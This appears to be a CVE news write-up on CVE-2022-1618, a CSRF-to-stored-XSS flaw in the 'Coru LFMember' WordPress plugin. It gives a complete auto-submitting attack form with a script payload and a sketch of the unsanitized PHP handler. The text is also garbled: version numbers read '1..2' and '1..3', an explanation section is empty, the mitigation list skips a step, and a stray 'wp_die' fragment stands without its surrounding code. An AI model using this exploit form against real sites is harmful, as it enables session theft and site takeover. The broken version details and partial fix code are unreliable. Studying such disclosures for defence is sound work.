CVE CyberSecurity Database News

CVE-2022-1618 - How a WordPress Plugin Bug Lets Attackers Inject XSS With a Single Click

Poster -

WordPress plugins power millions of sites. But even a small vulnerability in one can open huge security holes. One recent example is CVE-2022-1618: a critical flaw in the “Coru LFMember” plugin, which allows an attacker to trick an admin into adding a malicious game entry — and thereby inject persistent cross-site scripting (XSS). This post takes you through how the bug works, why CSRF and XSS happen here, how it’s exploited, and what you can do to stay safe.

What is CVE-2022-1618?

CVE-2022-1618 is a vulnerability in the "Coru LFMember" WordPress plugin, versions up to 1..2. This plugin is designed to manage games and members on gaming sites. However, security checks were missing:

No CSRF Protection: Actions like adding a new game lack anti-CSRF tokens.

- No Sanitization/Escaping: User input in the “add game” feature is neither sanitized (cleaned before saving) nor escaped (protected before output).

This means an attacker can craft a malicious request, and if a logged-in admin is tricked into clicking a link or loading a web page, they can unintentionally add a new game containing an XSS payload.

1. CSRF - Making the Admin Do the Work

Cross-Site Request Forgery (CSRF) means exploiting a site’s trust in a logged-in user. If an action (like adding a game) can be done by simply submitting a POST or GET request, and there’s no unique security token to confirm it was intended, any website can make that request in the background as soon as the admin visits.

2. XSS - Injecting Malicious Scripts

The plugin also doesn’t clean or escape input fields — like the game name or description — when displaying them later. That allows attackers to inject scripts (JavaScript), which run in the browser when anyone visits the page.

3. Combining the Two

An attacker can craft a webpage that, when visited by the site admin, submits a request to WordPress to add a new game. This would slip in a payload like <script>alert('XSS!');</script>. This script runs every time the games list is viewed, achieving persistent XSS.

Step 1: Attacker Creates a Malicious Page

On their own website, the attacker uses an auto-submitting form to POST to the vulnerable WordPress endpoint:

<form action="https://victim-site.com/wp-admin/admin-post.php"; method="POST" id="attackForm">
  <input type="hidden" name="action" value="lfmember_add_game">
  <input type="hidden" name="game_name" value="<script>alert('XSS!');</script>">
  <input type="hidden" name="other_field" value="test">
</form>
<script>
  document.getElementById("attackForm").submit();
</script>

Explanation:

Step 2: Attacker Lures the Admin

The attacker sends a phishing email or malicious link; the admin visits it while logged into their WordPress dashboard.

Step 3: XSS is Planted

The form submits silently in the background using the admin’s credentials. The malicious game is added.

Every time anyone views the games list, the injected <script> runs

alert('XSS!');

A real attack could do much worse — stealing cookies, taking over sessions, or creating new admin users.

So what’s wrong in the plugin code? It might look like this

// In the plugin's main PHP file

if ($_POST['action'] === 'lfmember_add_game') {
    // Take user input and insert directly
    $game_name = $_POST['game_name']; // no sanitization!
    $desc = $_POST['description'];

    // Insert into the database
    $wpdb->insert('wp_lfmember_games', [
        'name' => $game_name,
        'description' => $desc,
    ]);
    // No CSRF token checked
}

Original References

- NVD: CVE-2022-1618
- "Coru LFMember < 1..3 - Admin+ CSRF to Stored XSS"
- WordPress.org plugin page

For Users & Admins

1. Update Immediately: Make sure you’re running version 1..3 or later, where the developer patched the CSRF and XSS issues.

3. Use Security Plugins: Tools like Wordfence or Sucuri can help detect/stop some CSRF/XSS attacks.

wp_die('Security check failed!');

}

Conclusion

CVE-2022-1618 is a textbook example of what happens when even basic security is skipped in WordPress plugin development. If you use Coru LFMember, update now! And always check that your plugins — and any forms they process — use anti-CSRF tokens and sanitize every input.

For more details and latest updates, check out

- wpscan.com/vulnerability/79287b53-9b8d-44de-b40a-605b016b7052
- nvd.nist.gov/vuln/detail/CVE-2022-1618

Timeline

Published on: 01/16/2024 16:15:09 UTC
Last modified on: 01/24/2024 13:37:31 UTC